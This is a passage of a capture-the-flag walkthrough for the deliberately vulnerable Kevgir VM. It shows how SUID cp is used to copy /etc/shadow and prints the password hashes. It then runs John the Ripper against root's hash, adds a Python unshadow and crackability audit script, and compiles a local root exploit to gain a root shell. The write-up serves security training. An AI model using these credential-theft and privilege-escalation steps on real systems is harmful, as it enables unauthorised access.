# ssh admin@192.168.56.101 -p 1322
                                                                  
                                                                  
  G:                ,;                                            
  E#,    :        f#i                        .Gt  t    j.         
  E#t  .GE      .E#t                        j#W:  Ej   EW,        
  E#t j#K;     i#W,     t      .DD.       ;K#f    E#,  E##j       
  E#GK#f      L#D.      EK:   ,WK.      .G#D.     E#t  E###D.     
  E##D.     :K#Wfff;    E#t  i#D       j#K;       E#t  E#jG#W;    
  E##Wi     i##WLLLLt   E#t j#f      ,K#f   ,GD;  E#t  E#t t##f   
  E#jL#D:    .E#L       E#tL#i        j#Wi   E#t  E#t  E#t  :K#E: 
  E#t ,K#j     f#E:     E#WW,          .G#D: E#t  E#t  E#KDDDD###i
  E#t   jD      ,WW;    E#K:             ,K#fK#t  E#t  E#f,t#Wi,,,
  j#t            .D#;   ED.                j###t  E#t  E#t  ;#W:  
   ,;              tt   t                   .G#t  E#t  DWi   ,KK: 
                                              ;;  ,;.             
                                                                  
                                                   by canyoupwn.me

admin@192.168.56.101's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System load:  0.2               Processes:           147
  Usage of /:   32.6% of 6.50GB   Users logged in:     0
  Memory usage: 67%               IP address for eth0: 192.168.56.101
  Swap usage:   0%

admin@canyoupwnme:~$ find / -perm -u=s 2>/dev/null
/bin/umount
/bin/fusermount
/bin/ping6
/bin/mount
/bin/ping
/bin/su
/bin/cp
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/mtr
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/pt_chown
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/authbind/helper
/usr/sbin/uuidd
/usr/sbin/pppd
/etc/init.d/dhclient
/sbin/mount.cifs
/sbin/mount.nfs
admin@canyoupwnme:~$ ls -l /bin/cp
-rwsr-xr-x 1 root root 124932 Jan 14  2015 /bin/cp

The cp command has the SUID bit set, so I can abuse it to copy any file that root can read. So, I copy the /etc/shadow file to read its content and get the root password. Since I already have the passwd file, I unshadow /etc/passwd and /etc/shadow on my local machine and use John the Ripper to crack the password:

$ /bin/cp /etc/shadow /tmp/shadow
admin@canyoupwnme:~$ cat !$
cat /tmp/shadow
root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:16843:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
mysql:!:16834:0:99999:7:::
messagebus:*:16834:0:99999:7:::
landscape:*:16834:0:99999:7:::
sshd:*:16834:0:99999:7:::
tomcat7:*:16834:0:99999:7:::
user:$6$a9pCcsxn$5xvkibMZh9RDRVuAeC6vJSR2x17t52pYtdd50/rh3TY.ZoE53GE.OcbtVdBMRKROLko.qbIqj88k5mOXjtE3q.:16834:0:99999:7:::
ftp:*:16834:0:99999:7:::
admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7:::
statd:*:16839:0:99999:7:::
jenkins:*:16840:0:99999:7:::


== ON MY LOCAL MACHINE ==
# cat root_passwd.txt
root:x:0:0:root:/root:/bin/bash

# cat root_shadow.txt
root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:16843:0:99999:7:::

# unshadow root_passwd.txt root_shadow.txt 
root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:0:0:root:/root:/bin/bash

# echo 'root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:0:0:root:/root:/bin/bash' > root_unshadowed.txt

# john -wordlist:/usr/share/wordlists/rockyou.txt root_unshadowed.txt 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
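
An added example (not one of the post’s commands) of the unshadow step in Python, extended into a quick audit of which accounts actually have a crackable hash behind a login shell; the passwd and shadow excerpts are constructed from the listings above.

```python
"""Merge passwd and shadow the way unshadow(8) does, then report which
accounts carry a real, crackable hash behind an interactive shell.

Added example, not one of the original post's commands. The two files below
are constructed from a subset of the /etc/passwd and /tmp/shadow output
above, so the merged root line matches the unshadow output in the post.
"""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
admin:x:1002:1002:,,,:/home/admin:/bin/bash
jenkins:x:109:117:Jenkins,,,:/var/lib/jenkins:/bin/bash
"""

SHADOW = """\
root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:16843:0:99999:7:::
www-data:*:16652:0:99999:7:::
mysql:!:16834:0:99999:7:::
user:$6$a9pCcsxn$5xvkibMZh9RDRVuAeC6vJSR2x17t52pYtdd50/rh3TY.ZoE53GE.OcbtVdBMRKROLko.qbIqj88k5mOXjtE3q.:16834:0:99999:7:::
admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7:::
jenkins:*:16840:0:99999:7:::
"""

# crypt(3) prefixes; anything else that is 13 chars long is classic DES crypt.
HASH_PREFIXES = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt",
}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_colon_file(text):
    """Split passwd/shadow text into field lists, skipping blanks and comments."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def unshadow(passwd_text, shadow_text):
    """Return passwd lines with the 'x' placeholder replaced by the shadow hash."""
    hashes = {f[0]: f[1] for f in parse_colon_file(shadow_text) if len(f) >= 2}
    merged = []
    for fields in parse_colon_file(passwd_text):
        if len(fields) != 7:
            continue                      # malformed passwd entry
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def classify_hash(field):
    """Name the hash algorithm, or 'locked' / 'empty' for non-hashes."""
    if field == "":
        return "empty"                    # password-less login, worse than any hash
    if field.startswith(("*", "!")):
        return "locked"
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return "descrypt" if len(field) == 13 else "unknown"


def audit(passwd_text, shadow_text):
    """One record per passwd entry; crackable = real hash and an interactive shell."""
    shadow = {f[0]: f[1] for f in parse_colon_file(shadow_text) if len(f) >= 2}
    report = []
    for fields in parse_colon_file(passwd_text):
        if len(fields) != 7:
            continue
        user, shell = fields[0], fields[6]
        kind = classify_hash(shadow.get(user, fields[1]))
        report.append({
            "user": user, "uid": int(fields[2]), "shell": shell, "hash": kind,
            "crackable": kind not in ("locked", "unknown") and shell not in NOLOGIN_SHELLS,
        })
    return report


if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line)
    for row in audit(PASSWD, SHADOW):
        flag = "CRACKABLE" if row["crackable"] else "-"
        print(f"{row['user']:10} uid={row['uid']:<5} {row['hash']:12} {row['shell']:20} {flag}")
```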

In the meantime I try to use an actual exploit, since the version of the victim’s box is Ubuntu 14.04.03. I took the exploit from this URL: exploit-url

admin@canyoupwnme:/tmp$ vim r00t.c
admin@canyoupwnme:/tmp$ gcc r00t.c -o r00t
admin@canyoupwnme:/tmp$ ls -l | grep r00t
-rwxrwxr-x 1 admin    admin       8031 Mar 27 07:52 r00t
-rw-rw-r-- 1 admin    admin       2704 Mar 27 07:51 r00t.c
admin@canyoupwnme:/tmp$ ./r00t 
root@canyoupwnme:/tmp# id
uid=0(root) gid=1002(admin) groups=0(root),1002(admin)
root@canyoupwnme:/tmp# cd /root
root@canyoupwnme:/root# ls -l
total 4
drwxr-xr-x 2 root root 4096 Feb 13 10:10 banner
root@canyoupwnme:/root# cd banner
root@canyoupwnme:/root/banner# ls -l
total 4
-rw-r--r-- 1 root root 1140 Feb 13 10:12 kevgir
root@canyoupwnme:/root/banner# cat kevgir 
                                                                  
                                                                  
  G:                ,;                                            
  E#,    :        f#i                        .Gt  t    j.         
  E#t  .GE      .E#t                        j#W:  Ej   EW,        
  E#t j#K;     i#W,     t      .DD.       ;K#f    E#,  E##j       
  E#GK#f      L#D.      EK:   ,WK.      .G#D.     E#t  E###D.     
  E##D.     :K#Wfff;    E#t  i#D       j#K;       E#t  E#jG#W;    
  E##Wi     i##WLLLLt   E#t j#f      ,K#f   ,GD;  E#t  E#t t##f   
  E#jL#D:    .E#L       E#tL#i        j#Wi   E#t  E#t  E#t  :K#E: 
  E#t ,K#j     f#E:     E#WW,          .G#D: E#t  E#t  E#KDDDD###i
  E#t   jD      ,WW;    E#K:             ,K#fK#t  E#t  E#f,t#Wi,,,
  j#t            .D#;   ED.                j###t  E#t  E#t  ;#W:  
   ,;              tt   t                   .G#t  E#t  DWi   ,KK: 
                                              ;;  ,;.             
                                                                  
                                                   by canyoupwn.me

The cracking of the root password is taking too long. It appears to be a strong password (maybe not), so I will update this post when it’s done (if I find it :P).

Thanks to the team of canyoupwnme for the VM.

Conclusion

As usual, for any information or feedback, please do not hesitate to leave a comment.

./A